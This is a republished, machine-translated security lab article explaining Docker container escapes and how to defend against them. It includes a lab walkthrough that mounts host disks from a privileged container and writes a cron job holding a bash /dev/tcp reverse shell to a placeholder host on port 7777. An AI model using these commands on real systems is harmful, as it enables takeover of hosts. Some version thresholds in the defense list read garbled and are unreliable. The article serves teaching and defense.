Shulou(Shulou.com)06/02 Report--

Docker is one of the most widely used open source container technologies, which has the advantages of high efficiency and easy to use. Due to design reasons, Docker is born with strong security, even more secure than virtual machines, but have you ever thought that the "indestructible" Docker will also be breached, and the impact of Docker escape is almost sweeping Docker containers around the world. In this issue, Meituang Security Lab will take you to study the basic principle of Docker escape and the corresponding defense methods.

Introduction to Docker

Docker is a container, which is officially defined as packaging software into standardized units for development, delivery, and deployment. The container is characterized by uniform format, fast running speed, small resources required, and can overlap layer by layer.

Compared with the architecture of virtual machines, we can see that the overall architecture of Docker is lighter and more flexible. And because Docker uses the system kernel of the host directly, it can create a large number of containers in a few seconds, and their startup speed is an order of magnitude different.

Comparison of virtual machine and Docker architecture

(virtual machine architecture on left, Docker architecture on right)

Docker escape principle

Because Docker uses isolation technology, processes in the container cannot see processes outside, but processes outside can see inside, so if a container can access resources outside, or even obtain the permission of the host host, this is called "Docker escape".

At present, there are three reasons for Docker escape:

First, it is caused by kernel vulnerabilities.

Second, caused by the design of Docker software.

Third, it is caused by the privilege mode and improper configuration.

Next, we will briefly explain the three escape methods in turn.

01 escape caused by kernel vulnerabilities

Because Docker is a directly shared host kernel, the security of Docker will be affected when there are security vulnerabilities in the host kernel, which may lead to Docker escape. The specific process is as follows:

① uses kernel vulnerabilities to enter kernel context

② gets the task struct of the current process

③ backtrack task list to get the task struct of pid=1 and copy its related data

④ toggles current namespace

⑤ opens root shell and completes escape

02 escape caused by Doker software design

A typical example is Docker's standardized container execution engine-runc. Runc was exposed with a Docker escape vulnerability CVE-2019-5736 in February 2019. The principle of the vulnerability is that Docker, Containerd or other runc-based easy to have security vulnerabilities at run time. Attackers can obtain the file handle of the host runc execution file and modify the runc binary file through specific container image or exec operation, thus obtaining the host host root execution authority, resulting in Docker escape.

03 escape caused by privileged mode + directory mount

This method of escape is more useful than the other two. Privileged mode was introduced into Docker in version 6.0. its core function is to allow the root in the container to have the root permission of the external physical machine, while the previous root users in the container only have the permission of the ordinary user of the external physical machine.

When the container is started in privileged mode (docker run-- privileged), the Docker container is allowed to access all devices on the host, gain access to a large number of device files, and execute the mount command to mount.

When controlling containers that use privileged mode, Docker administrators can mount external host disk devices into the container through the mount command to obtain file read and write permissions to the entire host. In addition, commands can be executed on the host by writing scheduled tasks.

In addition to using privileged mode to start Docker will cause Docker escape, the use of functional mechanisms will also cause Docker escape. The Linux kernel has introduced functional mechanism (Capabilities) since version 2.2, which breaks the concept of superusers and ordinary users in the UNIX/LINUX operating system, and allows ordinary users to execute commands that can only be run with superuser privileges. For example, when the container is started with-- cap-add=SYSADMIN, the Container process is allowed to execute a series of system management commands such as mount, umount, and so on. If the attacker mounts the external device directory in the container at this time, Docker escape will occur.

Docker Escape experiment (privileged mode + directory mount)

Target machine: 192.168.210.37

The Docker service is opened on the target machine and runs on port 2375. You can view Docker information without authorization by directly accessing port 2375 of the target machine, as follows:

View all containers that exist in the current docker: docker images

Start the container using privileged mode

View the disk file: fdisk-l

From the returned results, sda1, sda2, and sda3 are in the / dev directory.

Create a new directory / test, and then mount / dev/sda1 to the new directory

Mkdir / test

Mount / dev/sda1/test

At this point, check the newly created directory / test, and you can access the contents of the directory on the host (the contents under the / root directory).

Similarly, create a new directory / test2, mount / dev/sda3 to the new directory, and look at the contents in the test2 directory to find that you can access the contents on the host machine / directory.

Write a bounce shell in the scheduled task:

Echo'* bash-I > & / dev/tcp/x.x.x.x/7777 0 > & 1'> > / test2/var/spool/cron/root

Open port 7777 of netcat snooping on Docker, successfully receive the Shell of the host host, and realize Docker escape.

Docker Escape Defense

➢ updates the Docker version to 19.03.1 and later-CVE-2019-14271, overriding CVE-2019-5736.

➢ runc version > 1.0-rc6

➢ k8s cluster version > 1.12

➢ Linux kernel version > = 2.6.22--CVE-2016-5195 (dirty cow)

➢ Linux kernel version > = 4.14--CVE-2017-1000405 (big dirty cow). No docker escape process was found, but there is a risk of escape.

➢ does not recommend running the Docker service with root privileges.

➢ does not recommend starting Docker in privileged (privileged mode).

➢ does not recommend mounting the host directory to the container directory.

➢ does not recommend starting the container with-cap-add=SYSADMIN, which means that the container process allows you to perform a series of system management operations such as mount, umount, etc., and there is a risk of container escape.

Meituang Technology focuses on data security, mining and casting data value around data security, disaster backup, data management, intelligent operation and maintenance, etc., with excellent product technology and services has won the recognition of many industries and user reputation!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.